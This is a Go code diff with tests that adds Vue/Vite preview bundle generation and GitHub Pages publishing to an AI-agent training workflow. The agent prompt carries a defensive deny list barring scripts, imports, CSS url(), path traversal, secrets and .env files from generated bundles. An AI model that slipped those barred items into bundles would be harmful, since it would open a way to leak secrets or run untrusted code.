+		if err := os.WriteFile(targetPath, content, 0o644); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func githubPagesURL(repo db.Repo, route string) string {
+	if strings.EqualFold(repo.Name, repo.Owner+".github.io") {
+		return fmt.Sprintf("https://%s.github.io/%s", repo.Owner, strings.TrimLeft(route, "/"))
+	}
+	return fmt.Sprintf("https://%s.github.io/%s/%s", repo.Owner, repo.Name, strings.TrimLeft(route, "/"))
+}
+
+func writeTrustedVueViteScaffold(workDir string) error {
+	packageJSON := `{"type":"module","scripts":{"build":"vite build"},"dependencies":{"@vitejs/plugin-vue":"latest","vite":"latest","vue":"latest"}}`
+	if err := os.WriteFile(filepath.Join(workDir, "package.json"), []byte(packageJSON), 0o644); err != nil {
+		return err
+	}
+	indexHTML := `<div id="app"></div><script type="module" src="/src/main.js"></script>`
+	if err := os.WriteFile(filepath.Join(workDir, "index.html"), []byte(indexHTML), 0o644); err != nil {
+		return err
+	}
+	mainPath := filepath.Join(workDir, "src", "main.js")
+	if err := os.MkdirAll(filepath.Dir(mainPath), 0o755); err != nil {
+		return err
+	}
+	mainJS := `import { createApp } from 'vue'; import App from './App.vue'; createApp(App).mount('#app');`
+	if err := os.WriteFile(mainPath, []byte(mainJS), 0o644); err != nil {
+		return err
+	}
+	viteConfig := "import { defineConfig } from 'vite';\nimport vue from '@vitejs/plugin-vue';\n\nexport default defineConfig({ base: './', plugins: [vue()] });\n"
+	return os.WriteFile(filepath.Join(workDir, "vite.config.js"), []byte(viteConfig), 0o644)
+}
+
+func previewRouteSlug(value string) string {
+	trimmed := strings.TrimSpace(value)
+	var builder strings.Builder
+	lastDash := false
+	for _, r := range strings.ToLower(trimmed) {
+		allowed := (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '.' || r == '_' || r == '-'
+		if allowed {
+			builder.WriteRune(r)
+			lastDash = false
+			continue
+		}
+		if !lastDash {
+			builder.WriteByte('-')
+			lastDash = true
+		}
+	}
+	slug := strings.Trim(builder.String(), ".-_")
+	if slug == "" {
+		slug = "value"
+	}
+	if slug != trimmed {
+		slug = slug + "-" + shortHash(trimmed)
+	}
+	return slug
+}
+
+func optionMetadataMap(metadataJSON string) map[string]any {
+	metadata := map[string]any{}
+	if strings.TrimSpace(metadataJSON) != "" {
+		_ = json.Unmarshal([]byte(metadataJSON), &metadata)
+	}
+	return metadata
+}
+
+func metadataStringValue(metadata map[string]any, key string) string {
+	if value, ok := metadata[key].(string); ok {
+		return strings.TrimSpace(value)
+	}
+	return ""
+}
+
+func metadataNumber(metadata map[string]any, key string) int {
+	switch value := metadata[key].(type) {
+	case float64:
+		return int(value)
+	case int:
+		return value
+	case int64:
+		return int(value)
+	default:
+		return 0
+	}
+}
+
+func encodeOptionMetadata(metadata map[string]any) string {
+	encoded, err := json.Marshal(metadata)
+	if err != nil {
+		return ""
+	}
+	return string(encoded)
 }
 
 func runSkillOptTrainStop(args []string, stdout, stderr io.Writer) int {
@@ -3377,6 +4152,28 @@ func buildSkillOptTrainGenerationPrompt(session db.SkillOptTrainSession, iterati
 	}
 	builder.WriteString("- Keep the artifact self-contained and directly reviewable.\n")
 	builder.WriteString("- Preserve the requested output type.\n")
+	if skillOptTrainWantsVuePreviewBundle(session) {
+		requiresVuePreviewBundle := skillOptTrainRequiresVuePreviewBundle(session)
+		builder.WriteString("\nPreview bundle contract:\n")
+		if requiresVuePreviewBundle {
+			builder.WriteString("- This train session requires a Vue/Vite preview bundle for every generated option.\n")
+			builder.WriteString("- Keep gitmoot_result.summary as a string value. The string content must be exactly one serialized JSON object, with no markdown, code fences, or prose.\n")
+			builder.WriteString("- Do not set gitmoot_result.summary to a nested object; encode the bundle JSON as the summary string.\n")
+		} else {
+			builder.WriteString("- This train session is configured for optional Vue/Vite previews. Prefer a Vue/Vite preview bundle so Gitmoot can publish preview URLs; plain text or markdown is accepted only as inline fallback.\n")
+			builder.WriteString("- If you return a preview bundle, keep gitmoot_result.summary as a string containing exactly one serialized JSON object, with no markdown, code fences, or prose.\n")
+			builder.WriteString("- If you return plain text or markdown fallback, use the normal summary string and do not include the bundle JSON shape.\n")
+		}
+		builder.WriteString("- Use renderer \"vue-vite\".\n")
+		builder.WriteString("- Include build_command exactly \"npm run build\" and dist_dir \"dist\".\n")
+		builder.WriteString("- Include files with these required relative paths: package.json, index.html, src/main.js, src/App.vue.\n")
+		builder.WriteString("- package.json scripts must include only \"build\": \"vite build\". Do not include dependencies or devDependencies; Gitmoot supplies trusted build dependencies.\n")
+		builder.WriteString("- index.html and src/main.js must use the standard Vue mount scaffold exactly; Gitmoot overwrites them with trusted scaffold files before build.\n")
+		builder.WriteString("- src/App.vue must be scriptless template/style Vue only. Do not include script blocks, imports, require, import.meta, @import, or CSS url().\n")
+		builder.WriteString("- Each file entry must have path and non-empty content. Use slash-separated relative paths only.\n")
+		builder.WriteString("- Do not include local absolute paths, path traversal, secrets, .env files, node_modules, dependency caches, dist, built outputs, vite.config.js, or files outside the required paths.\n")
+		builder.WriteString("- The JSON object shape is: renderer string, files array of {path, content}, build_command string, dist_dir string.\n")
+	}
 	return builder.String()
 }
 
@@ -3403,13 +4200,16 @@ func prepareReviewItemContentArtifact(blobStore artifact.Store, runID string, it
 	}, nil
 }
 
-func skillOptTrainGeneratedOptionMetadata(output localAgentJobOutput, prompt string) string {
+func skillOptTrainGeneratedOptionMetadata(output localAgentJobOutput, prompt string, previewBundleMetadata *skillopt.PreviewBundleMetadata) string {
 	metadata := map[string]any{
 		"source":           "gitmoot skillopt train continue",
 		"job_id":           output.JobID,
 		"agent":            output.Agent,
 		"prompt":           prompt,
 		"raw_output_count": output.RawOutputCount,
+	}
+	if previewBundleMetadata != nil {
+		metadata["preview_bundle"] = *previewBundleMetadata
 	}
 	encoded, err := json.Marshal(metadata)
 	if err != nil {

--- a/internal/cli/skillopt_test.go
+++ b/internal/cli/skillopt_test.go
@@ -798,6 +798,86 @@ func TestGeneratedSkillOptTrainSessionIDIncludesSubsecondEntropy(t *testing.T) {
 	}
 }
 
+func TestSkillOptGitHubPagesURLHandlesProjectAndUserPages(t *testing.T) {
+	project := githubPagesURL(db.Repo{Owner: "owner", Name: "previews"}, "runs/run-1/item/a/")
+	if project != "https://owner.github.io/previews/runs/run-1/item/a/" {
+		t.Fatalf("project pages URL = %q", project)
+	}
+	user := githubPagesURL(db.Repo{Owner: "owner", Name: "owner.github.io"}, "runs/run-1/item/a/")
+	if user != "https://owner.github.io/runs/run-1/item/a/" {
+		t.Fatalf("user pages URL = %q", user)
+	}
+}
+
+func TestSkillOptPreviewRouteSlugsUnsafeSegments(t *testing.T) {
+	route, err := skillOptPreviewRoute("", "run 1", "hero#main", "A/B?")
+	if err != nil {
+		t.Fatalf("skillOptPreviewRoute returned error: %v", err)
+	}
+	want := "runs/run-1-" + shortHash("run 1") + "/hero-main-" + shortHash("hero#main") + "/a-b-" + shortHash("A/B?") + "/"
+	if route != want {
+		t.Fatalf("route = %q, want %q", route, want)
+	}
+}
+
+func TestTrustedVueViteScaffoldUsesRelativeBase(t *testing.T) {
+	workDir := t.TempDir()
+	if err := writeTrustedVueViteScaffold(workDir); err != nil {
+		t.Fatalf("writeTrustedVueViteScaffold returned error: %v", err)
+	}
+	config, err := os.ReadFile(filepath.Join(workDir, "vite.config.js"))
+	if err != nil {
+		t.Fatalf("read vite config: %v", err)
+	}
+	if !strings.Contains(string(config), "base: './'") {
+		t.Fatalf("vite config missing relative base:\n%s", string(config))
+	}
+}
+
+func TestPublishGitHubPagesPreviewRestoresCheckoutOnCommitFailure(t *testing.T) {
+	previewDir := t.TempDir()
+	runGit(t, previewDir, "init")
+	runGit(t, previewDir, "config", "user.email", "gitmoot@example.com")
+	runGit(t, previewDir, "config", "user.name", "Gitmoot")
+	runGit(t, previewDir, "branch", "-m", "main")
+	if err := os.WriteFile(filepath.Join(previewDir, "README.md"), []byte("previews\n"), 0o644); err != nil {
+		t.Fatalf("write README: %v", err)
+	}
+	runGit(t, previewDir, "add", "README.md")
+	runGit(t, previewDir, "commit", "-m", "init")
+	distDir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(distDir, "index.html"), []byte("<main>preview</main>\n"), 0o644); err != nil {
+		t.Fatalf("write dist index: %v", err)
+	}
+	previewRunner := &skillOptTrainFakePreviewRunner{failGitCommit: true}
+	oldPreviewRunner := skillOptTrainPreviewRunner
+	skillOptTrainPreviewRunner = previewRunner
+	defer func() {
+		skillOptTrainPreviewRunner = oldPreviewRunner
+	}()
+
+	_, err := publishGitHubPagesPreview(context.Background(), db.Repo{Owner: "owner", Name: "previews", CheckoutPath: previewDir}, "runs/run-1/item/a/", distDir)
+	if err == nil || !strings.Contains(err.Error(), "git commit") {
+		t.Fatalf("publishGitHubPagesPreview error = %v, want git commit", err)
+	}
+	status := runGitOutput(t, previewDir, "status", "--porcelain")
+	if strings.TrimSpace(status) != "" {
+		t.Fatalf("preview repo left dirty after commit failure:\n%s", status)
+	}
+	if _, err := os.Stat(filepath.Join(previewDir, "runs")); !errors.Is(err, os.ErrNotExist) {
+		t.Fatalf("preview route was not cleaned, stat err=%v", err)
+	}
+}
+
+func runGitOutput(t *testing.T, dir string, args ...string) string {
+	t.Helper()
+	result, err := subprocess.ExecRunner{}.Run(context.Background(), dir, "git", args...)
+	if err != nil {
+		t.Fatalf("git %s failed: %v\n%s", strings.Join(args, " "), err, result.Stderr)
+	}
+	return result.Stdout
+}
+
 func TestSkillOptTrainContinueGeneratesOptionsWithManagedAgent(t *testing.T) {
 	home := t.TempDir()
 	repoDir := t.TempDir()
@@ -939,14 +1019,444 @@ func TestSkillOptTrainContinueGeneratesOptionsWithManagedAgent(t *testing.T) {
 		}
 	}
 
+	fakeGitHub := &skillOptFakeGitHub{}
+	oldClient := newSkillOptGitHubClient
+	newSkillOptGitHubClient = func() github.Client { return fakeGitHub }
+	defer func() {
+		newSkillOptGitHubClient = oldClient
+	}()
+
 	stdout.Reset()
 	stderr.Reset()
 	code = Run([]string{"skillopt", "train", "continue", "--home", home, "--session", "landing-train"}, &stdout, &stderr)
 	if code != 0 {
 		t.Fatalf("second train continue exit code = %d, stderr=%s", code, stderr.String())
 	}
-	if !strings.Contains(stdout.String(), "continue_ready: false") || !strings.Contains(stdout.String(), "options already generated") {
+	if !strings.Contains(stdout.String(), "current_phase: review_published") ||
+		!strings.Contains(stdout.String(), "continue_ready: true") ||
+		!strings.Contains(stdout.String(), "review_repo: owner/product") ||
+		!strings.Contains(stdout.String(), "preview_urls: 0") {
 		t.Fatalf("second continue stdout = %q", stdout.String())
+	}
+	if fakeGitHub.createdIssue.Repo.FullName() != "owner/product" || !strings.Contains(fakeGitHub.createdIssue.Body, "## Inline Options Without Public Links") {
+		t.Fatalf("created review issue = %+v", fakeGitHub.createdIssue)
+	}
+}
+
+func TestSkillOptTrainContinueGeneratesRequiredVuePreviewBundles(t *testing.T) {
+	home := t.TempDir()
+	repoDir := t.TempDir()
+	runGit(t, repoDir, "init")
+	runGit(t, repoDir, "branch", "-m", "main")
+	runGit(t, repoDir, "remote", "add", "origin", "https://github.com/owner/workspace.git")
+	t.Chdir(repoDir)
+	itemsPath := writeSkillOptTrainItemsFile(t)
+	paths := config.PathsForHome(home)
+	if err := config.Initialize(paths); err != nil {
+		t.Fatalf("Initialize returned error: %v", err)
+	}
+	store, err := db.Open(paths.Database)
+	if err != nil {
+		t.Fatalf("Open returned error: %v", err)
+	}
+	if err := store.UpsertAgentTemplate(context.Background(), cliSkillOptTemplate("planner", "Plan the work.")); err != nil {
+		t.Fatalf("UpsertAgentTemplate returned error: %v", err)
+	}
+	if err := store.Close(); err != nil {
+		t.Fatalf("Close after template seed returned error: %v", err)
+	}
+
+	var stdout, stderr bytes.Buffer
+	if code := Run([]string{
+		"agent", "type", "set", "skillopt-generator",
+		"--home", home,
+		"--runtime", "codex",
+		"--role", "generator",
+		"--max-background", "1",
+		"--capability", "ask",
+	}, &stdout, &stderr); code != 0 {
+		t.Fatalf("agent type set exit code = %d, stderr=%s", code, stderr.String())
+	}
+	stdout.Reset()
+	stderr.Reset()
+	if code := Run([]string{
+		"skillopt", "train", "start",
+		"--home", home,
+		"--template", "planner",
+		"--repo", "owner/product",
+		"--session", "preview-train",
+		"--workspace-repo", "owner/workspace",
+		"--preview-repo", "owner/previews",
+		"--request", "Train landing page previews.",
+		"--task-kind", "design",
+		"--mode", "explore",
+		"--options", "2",
+		"--items-file", itemsPath,
+		"--yes",
+	}, &stdout, &stderr); code != 0 {
+		t.Fatalf("train start exit code = %d, stderr=%s", code, stderr.String())
+	}
+
+	runner := &agentStartRunner{results: []subprocess.Result{
+		{Stdout: `{"type":"thread.started","thread_id":"550e8400-e29b-41d4-a716-446655440501"}` + "\n"},
+		cliImplementedSummaryResult(t, cliVuePreviewBundleSummary(t, "Option A hero")),
+		cliImplementedSummaryResult(t, cliVuePreviewBundleSummary(t, "Option B hero")),
+		cliImplementedSummaryResult(t, cliVuePreviewBundleSummary(t, "Option A proof")),
+		cliImplementedSummaryResult(t, cliVuePreviewBundleSummary(t, "Option B proof")),
+	}}
+	restoreFactory := replaceRuntimeFactory(runtime.Factory{Runner: runner})
+	defer restoreFactory()
+
+	stdout.Reset()
+	stderr.Reset()
+	code := Run([]string{"skillopt", "train", "continue", "--home", home, "--session", "preview-train"}, &stdout, &stderr)
+	if code != 0 {
+		t.Fatalf("train continue exit code = %d, stderr=%s", code, stderr.String())
+	}
+	if !strings.Contains(stdout.String(), "current_phase: options_generated") || !strings.Contains(stdout.String(), "generated_options: 4") {
+		t.Fatalf("train continue stdout = %s", stdout.String())
+	}
+	prompt := runner.calls[1].args[len(runner.calls[1].args)-1]
+	for _, want := range []string{
+		"Vue/Vite preview bundle",
+		"summary as a string value",
+		"Do not set gitmoot_result.summary to a nested object",
+		"package.json, index.html, src/main.js, src/App.vue",
+		"Do not include local absolute paths",
+	} {
+		if !strings.Contains(prompt, want) {
+			t.Fatalf("preview prompt missing %q:\n%s", want, prompt)
+		}
+	}
+
+	store = openCLIJobStore(t, home)
+	defer store.Close()
+	options, err := store.ListEvalReviewOptions(context.Background(), "preview-train-review-001", "hero-saas")
+	if err != nil {
+		t.Fatalf("ListEvalReviewOptions returned error: %v", err)
+	}
+	if len(options) != 2 {
+		t.Fatalf("options = %+v", options)
+	}
+	artifactRecord, err := store.GetEvalArtifact(context.Background(), options[0].ArtifactID)
+	if err != nil {
+		t.Fatalf("GetEvalArtifact returned error: %v", err)
+	}
+	if artifactRecord.MediaType != "application/json" || artifactRecord.Driver != skillopt.TrainPreviewRendererVueVite {
+		t.Fatalf("artifact = %+v", artifactRecord)
+	}
+	artifactContent, err := artifact.NewStore(paths.ArtifactBlobs).Read(artifactRecord.Hash)
+	if err != nil {
+		t.Fatalf("Read preview bundle artifact returned error: %v", err)
+	}
+	if _, err := skillopt.ParsePreviewBundle(artifactContent); err != nil {
+		t.Fatalf("stored preview bundle did not parse: %v\n%s", err, string(artifactContent))
+	}
+	var metadata map[string]any
+	if err := json.Unmarshal([]byte(options[0].MetadataJSON), &metadata); err != nil {
+		t.Fatalf("option metadata unmarshal returned error: %v", err)
+	}
+	bundleMetadata, ok := metadata["preview_bundle"].(map[string]any)
+	if !ok {
+		t.Fatalf("option metadata missing preview_bundle: %s", options[0].MetadataJSON)
+	}
+	if bundleMetadata["renderer"] != skillopt.TrainPreviewRendererVueVite || int(bundleMetadata["file_count"].(float64)) != 4 || bundleMetadata["build_command"] != "npm run build" || bundleMetadata["dist_dir"] != "dist" {
+		t.Fatalf("preview bundle metadata = %+v", bundleMetadata)
+	}
+	if _, ok := bundleMetadata["content"]; ok {
+		t.Fatalf("preview bundle metadata included file content: %+v", bundleMetadata)
+	}
+
+	previewDir := t.TempDir()
+	runGit(t, previewDir, "init")
+	runGit(t, previewDir, "config", "user.email", "gitmoot@example.com")
+	runGit(t, previewDir, "config", "user.name", "Gitmoot")
+	runGit(t, previewDir, "branch", "-m", "main")
+	runGit(t, previewDir, "remote", "add", "origin", "https://github.com/owner/previews.git")
+	if err := os.WriteFile(filepath.Join(previewDir, "README.md"), []byte("previews\n"), 0o644); err != nil {
+		t.Fatalf("write preview README: %v", err)
+	}
+	runGit(t, previewDir, "add", "README.md")
+	runGit(t, previewDir, "commit", "-m", "init")
+	if err := store.UpsertRepo(context.Background(), db.Repo{Owner: "owner", Name: "previews", CheckoutPath: previewDir, PollInterval: "30s"}); err != nil {
+		t.Fatalf("UpsertRepo preview returned error: %v", err)
+	}
+	previewRunner := &skillOptTrainFakePreviewRunner{}
+	oldPreviewRunner := skillOptTrainPreviewRunner
+	skillOptTrainPreviewRunner = previewRunner
+	defer func() {
+		skillOptTrainPreviewRunner = oldPreviewRunner
+	}()
+	fakeGitHub := &skillOptFakeGitHub{}
+	oldClient := newSkillOptGitHubClient
+	newSkillOptGitHubClient = func() github.Client { return fakeGitHub }
+	defer func() {
+		newSkillOptGitHubClient = oldClient
+	}()
+
+	stdout.Reset()
+	stderr.Reset()
+	code = Run([]string{"skillopt", "train", "continue", "--home", home, "--session", "preview-train"}, &stdout, &stderr)
+	if code != 0 {
+		t.Fatalf("second train continue exit code = %d, stderr=%s", code, stderr.String())
+	}
+	if !strings.Contains(stdout.String(), "current_phase: review_published") ||
+		!strings.Contains(stdout.String(), "review_repo: owner/previews") ||
+		!strings.Contains(stdout.String(), "preview_urls: 4") {
+		t.Fatalf("second train continue stdout = %s", stdout.String())
+	}
+	wantPreviewURL := "https://owner.github.io/previews/runs/preview-train-review-001/hero-saas/a/"
+	if fakeGitHub.createdIssue.Repo.FullName() != "owner/previews" ||
+		!strings.Contains(fakeGitHub.createdIssue.Body, "Option A: [open]("+wantPreviewURL+")") ||
+		strings.Contains(fakeGitHub.createdIssue.Body, "## Inline Options Without Public Links") ||
+		strings.Contains(fakeGitHub.createdIssue.Body, `"renderer":"vue-vite"`) {
+		t.Fatalf("created preview review issue = %+v\n%s", fakeGitHub.createdIssue, fakeGitHub.createdIssue.Body)
+	}
+	if _, err := os.Stat(filepath.Join(previewDir, "runs", "preview-train-review-001", "hero-saas", "a", "index.html")); err != nil {
+		t.Fatalf("preview index was not published: %v", err)
+	}
+	options, err = store.ListEvalReviewOptions(context.Background(), "preview-train-review-001", "hero-saas")
+	if err != nil {
+		t.Fatalf("ListEvalReviewOptions after publish returned error: %v", err)
+	}
+	if !strings.Contains(options[0].MetadataJSON, `"preview_url":"`+wantPreviewURL+`"`) {
+		t.Fatalf("option metadata missing preview_url: %s", options[0].MetadataJSON)
+	}
+}
+
+func TestSkillOptTrainContinueAllowsOptionalVuePreviewFallback(t *testing.T) {
+	home := t.TempDir()
+	repoDir := t.TempDir()
+	runGit(t, repoDir, "init")
+	runGit(t, repoDir, "branch", "-m", "main")
+	runGit(t, repoDir, "remote", "add", "origin", "https://github.com/owner/workspace.git")
+	t.Chdir(repoDir)
+	itemsPath := writeSkillOptTrainItemsFile(t)
+	paths := config.PathsForHome(home)
+	if err := config.Initialize(paths); err != nil {
+		t.Fatalf("Initialize returned error: %v", err)
+	}
+	store, err := db.Open(paths.Database)
+	if err != nil {
+		t.Fatalf("Open returned error: %v", err)
+	}
+	if err := store.UpsertAgentTemplate(context.Background(), cliSkillOptTemplate("planner", "Plan the work.")); err != nil {
+		t.Fatalf("UpsertAgentTemplate returned error: %v", err)
+	}
+	if err := store.Close(); err != nil {
+		t.Fatalf("Close after template seed returned error: %v", err)
+	}
+
+	var stdout, stderr bytes.Buffer
+	if code := Run([]string{
+		"agent", "type", "set", "skillopt-generator",
+		"--home", home,
+		"--runtime", "codex",
+		"--role", "generator",
+		"--max-background", "1",
+		"--capability", "ask",
+	}, &stdout, &stderr); code != 0 {
+		t.Fatalf("agent type set exit code = %d, stderr=%s", code, stderr.String())
+	}
+	stdout.Reset()
+	stderr.Reset()
+	if code := Run([]string{
+		"skillopt", "train", "start",
+		"--home", home,
+		"--template", "planner",
+		"--repo", "owner/product",
+		"--session", "optional-preview-train",
+		"--workspace-repo", "owner/workspace",
+		"--preview-repo", "owner/previews",
+		"--preview-mode", "optional",
+		"--request", "Train landing page previews.",
+		"--task-kind", "design",
+		"--mode", "explore",
+		"--options", "2",
+		"--items-file", itemsPath,
+		"--yes",
+	}, &stdout, &stderr); code != 0 {
+		t.Fatalf("train start exit code = %d, stderr=%s", code, stderr.String())
+	}
+
+	runner := &agentStartRunner{results: []subprocess.Result{
+		{Stdout: `{"type":"thread.started","thread_id":"550e8400-e29b-41d4-a716-446655440503"}` + "\n"},
+		cliImplementedSummaryResult(t, cliVuePreviewBundleSummary(t, "Option A optional preview")),
+		cliImplementedSummaryResult(t, "# Option B\n\nMarkdown fallback."),
+		cliImplementedSummaryResult(t, "# Option A\n\nMarkdown fallback."),
+		cliImplementedSummaryResult(t, "# Option B\n\nMarkdown fallback."),
+	}}
+	restoreFactory := replaceRuntimeFactory(runtime.Factory{Runner: runner})
+	defer restoreFactory()
+
+	stdout.Reset()
+	stderr.Reset()
+	code := Run([]string{"skillopt", "train", "continue", "--home", home, "--session", "optional-preview-train"}, &stdout, &stderr)
+	if code != 0 {
+		t.Fatalf("train continue exit code = %d, stderr=%s", code, stderr.String())
+	}
+	prompt := runner.calls[1].args[len(runner.calls[1].args)-1]
+	for _, want := range []string{
+		"optional Vue/Vite previews",
+		"Prefer a Vue/Vite preview bundle",
+		"plain text or markdown is accepted only as inline fallback",
+	} {
+		if !strings.Contains(prompt, want) {
+			t.Fatalf("optional preview prompt missing %q:\n%s", want, prompt)
+		}
+	}
+
+	store = openCLIJobStore(t, home)
+	defer store.Close()
+	options, err := store.ListEvalReviewOptions(context.Background(), "optional-preview-train-review-001", "")
+	if err != nil {
+		t.Fatalf("ListEvalReviewOptions returned error: %v", err)
+	}
+	if len(options) != 4 {
+		t.Fatalf("options = %+v", options)
+	}
+	var bundleOptions int
+	var fallbackOptions int
+	for _, option := range options {
+		artifactRecord, err := store.GetEvalArtifact(context.Background(), option.ArtifactID)
+		if err != nil {
+			t.Fatalf("GetEvalArtifact returned error: %v", err)
+		}
+		var metadata map[string]any
+		if err := json.Unmarshal([]byte(option.MetadataJSON), &metadata); err != nil {
+			t.Fatalf("option metadata unmarshal returned error: %v", err)
+		}
+		_, hasBundleMetadata := metadata["preview_bundle"]
+		switch {
+		case artifactRecord.MediaType == "application/json" && artifactRecord.Driver == skillopt.TrainPreviewRendererVueVite:
+			bundleOptions++
+			if !hasBundleMetadata {
+				t.Fatalf("bundle option metadata missing preview_bundle: %s", option.MetadataJSON)
+			}
+		case artifactRecord.MediaType == "text/markdown" && artifactRecord.Driver == "text":
+			fallbackOptions++
+			if hasBundleMetadata {
+				t.Fatalf("fallback option metadata unexpectedly included preview_bundle: %s", option.MetadataJSON)
+			}
+		default:
+			t.Fatalf("unexpected optional preview artifact = %+v", artifactRecord)
+		}
+	}
+	if bundleOptions == 0 || fallbackOptions == 0 {
+		t.Fatalf("optional preview generated bundleOptions=%d fallbackOptions=%d", bundleOptions, fallbackOptions)
+	}
+
+	fakeGitHub := &skillOptFakeGitHub{}
+	oldClient := newSkillOptGitHubClient
+	newSkillOptGitHubClient = func() github.Client { return fakeGitHub }
+	defer func() {
+		newSkillOptGitHubClient = oldClient
+	}()
+
+	stdout.Reset()
+	stderr.Reset()
+	code = Run([]string{"skillopt", "train", "continue", "--home", home, "--session", "optional-preview-train"}, &stdout, &stderr)
+	if code != 0 {
+		t.Fatalf("second train continue exit code = %d, stderr=%s", code, stderr.String())
+	}
+	if !strings.Contains(stdout.String(), "current_phase: review_published") ||
+		!strings.Contains(stdout.String(), "review_repo: owner/previews") ||
+		!strings.Contains(stdout.String(), "preview_urls: 0") {
+		t.Fatalf("second train continue stdout = %s", stdout.String())
+	}
+	if fakeGitHub.createdIssue.Repo.FullName() != "owner/previews" ||
+		!strings.Contains(fakeGitHub.createdIssue.Body, "Vue/Vite preview source") ||
+		strings.Contains(fakeGitHub.createdIssue.Body, `"renderer":"vue-vite"`) {
+		t.Fatalf("optional preview fallback issue = %+v\n%s", fakeGitHub.createdIssue, fakeGitHub.createdIssue.Body)
+	}
+}
+
+func TestSkillOptTrainContinueFailsRequiredVuePreviewForProseOutput(t *testing.T) {
+	home := t.TempDir()
+	repoDir := t.TempDir()
+	runGit(t, repoDir, "init")
+	runGit(t, repoDir, "branch", "-m", "main")
+	runGit(t, repoDir, "remote", "add", "origin", "https://github.com/owner/workspace.git")
+	t.Chdir(repoDir)
+	itemsPath := writeSkillOptTrainItemsFile(t)
+	paths := config.PathsForHome(home)
+	if err := config.Initialize(paths); err != nil {
+		t.Fatalf("Initialize returned error: %v", err)
+	}
+	store, err := db.Open(paths.Database)
+	if err != nil {
+		t.Fatalf("Open returned error: %v", err)
+	}
+	if err := store.UpsertAgentTemplate(context.Background(), cliSkillOptTemplate("planner", "Plan the work.")); err != nil {
+		t.Fatalf("UpsertAgentTemplate returned error: %v", err)
+	}
+	if err := store.Close(); err != nil {
+		t.Fatalf("Close after template seed returned error: %v", err)
+	}
+
+	var stdout, stderr bytes.Buffer
+	if code := Run([]string{
+		"agent", "type", "set", "skillopt-generator",
+		"--home", home,
+		"--runtime", "codex",
+		"--role", "generator",
+		"--max-background", "1",
+		"--capability", "ask",
+	}, &stdout, &stderr); code != 0 {
+		t.Fatalf("agent type set exit code = %d, stderr=%s", code, stderr.String())
+	}
+	stdout.Reset()
+	stderr.Reset()
+	if code := Run([]string{
+		"skillopt", "train", "start",
+		"--home", home,
+		"--template", "planner",
+		"--repo", "owner/product",
+		"--session", "preview-train",
+		"--workspace-repo", "owner/workspace",
+		"--preview-repo", "owner/previews",
+		"--request", "Train landing page previews.",
+		"--task-kind", "design",
+		"--mode", "explore",
+		"--options", "2",
+		"--items-file", itemsPath,
+		"--yes",
+	}, &stdout, &stderr); code != 0 {
+		t.Fatalf("train start exit code = %d, stderr=%s", code, stderr.String())
+	}
+
+	runner := &agentStartRunner{results: []subprocess.Result{
+		{Stdout: `{"type":"thread.started","thread_id":"550e8400-e29b-41d4-a716-446655440502"}` + "\n"},
+		cliImplementedSummaryResult(t, "# Option A\n\nMarkdown is not a preview bundle."),
+		cliImplementedSummaryResult(t, "# Option A\n\nMarkdown is not a preview bundle."),
+	}}
+	restoreFactory := replaceRuntimeFactory(runtime.Factory{Runner: runner})
+	defer restoreFactory()
+
+	stdout.Reset()
+	stderr.Reset()
+	code := Run([]string{"skillopt", "train", "continue", "--home", home, "--session", "preview-train"}, &stdout, &stderr)
+	if code != 1 {
+		t.Fatalf("train continue exit code = %d, want 1; stdout=%s stderr=%s", code, stdout.String(), stderr.String())
+	}
+	if !strings.Contains(stderr.String(), "preview bundle") || !strings.Contains(stderr.String(), "decode preview bundle JSON") {
+		t.Fatalf("preview bundle failure stderr = %q", stderr.String())
+	}
+	store = openCLIJobStore(t, home)
+	defer store.Close()
+	iteration, err := store.GetLatestSkillOptTrainIteration(context.Background(), "preview-train")
+	if err != nil {
+		t.Fatalf("GetLatestSkillOptTrainIteration returned error: %v", err)
+	}
+	if iteration.State != skillopt.TrainStateItemsReady || !strings.Contains(iteration.MetadataJSON, `"status":"failed"`) || !strings.Contains(iteration.MetadataJSON, "preview bundle") {
+		t.Fatalf("iteration after preview failure = %+v metadata=%s", iteration, iteration.MetadataJSON)
+	}
+	options, err := store.ListEvalReviewOptions(context.Background(), "preview-train-review-001", "hero-saas")
+	if err != nil {
+		t.Fatalf("ListEvalReviewOptions returned error: %v", err)
+	}
+	if len(options) != 0 {
+		t.Fatalf("failure persisted preview options: %+v", options)
 	}
 }
 
@@ -3597,6 +4107,45 @@ func writeSkillOptTrainItemsFile(t *testing.T) string {
 	return itemsPath
 }
 
+func cliImplementedSummaryResult(t *testing.T, summary string) subprocess.Result {
+	t.Helper()
+	encoded, err := json.Marshal(map[string]any{
+		"gitmoot_result": map[string]any{
+			"decision":     "implemented",
+			"summary":      summary,
+			"findings":     []any{},
+			"changes_made": []any{},
+			"tests_run":    []any{},
+			"needs":        []any{},
+			"next_agents":  []any{},
+		},
+	})
+	if err != nil {
+		t.Fatalf("Marshal implemented summary result returned error: %v", err)
+	}
+	return subprocess.Result{Stdout: string(encoded) + "\n"}
+}
+
+func cliVuePreviewBundleSummary(t *testing.T, marker string) string {
+	t.Helper()
+	bundle := skillopt.PreviewBundle{
+		Renderer:     skillopt.TrainPreviewRendererVueVite,
+		BuildCommand: "npm run build",
+		DistDir:      "dist",
+		Files: []skillopt.PreviewBundleFile{
+			{Path: "package.json", Content: `{"scripts":{"build":"vite build"}}`},
+			{Path: "index.html", Content: `<div id="app"></div><script type="module" src="/src/main.js"></script>`},
+			{Path: "src/main.js", Content: `import { createApp } from 'vue'; import App from './App.vue'; createApp(App).mount('#app');`},
+			{Path: "src/App.vue", Content: `<template><main>` + marker + `</main></template>`},
+		},
+	}
+	encoded, err := json.Marshal(bundle)
+	if err != nil {
+		t.Fatalf("Marshal Vue preview bundle returned error: %v", err)
+	}
+	return string(encoded)
+}
+
 func TestSkillOptTrainStartDryRunDoesNotInitializeFreshHome(t *testing.T) {
 	home := t.TempDir()
 	itemsPath := filepath.Join(t.TempDir(), "items.yml")
@@ -5778,6 +6327,56 @@ func (r *skillOptTrainFakeOptimizerRunner) LookPath(file string) (string, error)
 	}
 	if strings.TrimSpace(r.lookPathValue) != "" {
 		return r.lookPathValue, nil
+	}
+	return "/fake/bin/" + file, nil
+}
+
+type skillOptTrainFakePreviewRunner struct {
+	failGitCommit bool
+	calls         []skillOptTrainFakePreviewCall
+}
+
+type skillOptTrainFakePreviewCall struct {
+	dir     string
+	command string
+	args    []string
+}
+
+func (r *skillOptTrainFakePreviewRunner) Run(ctx context.Context, dir string, command string, args ...string) (subprocess.Result, error) {
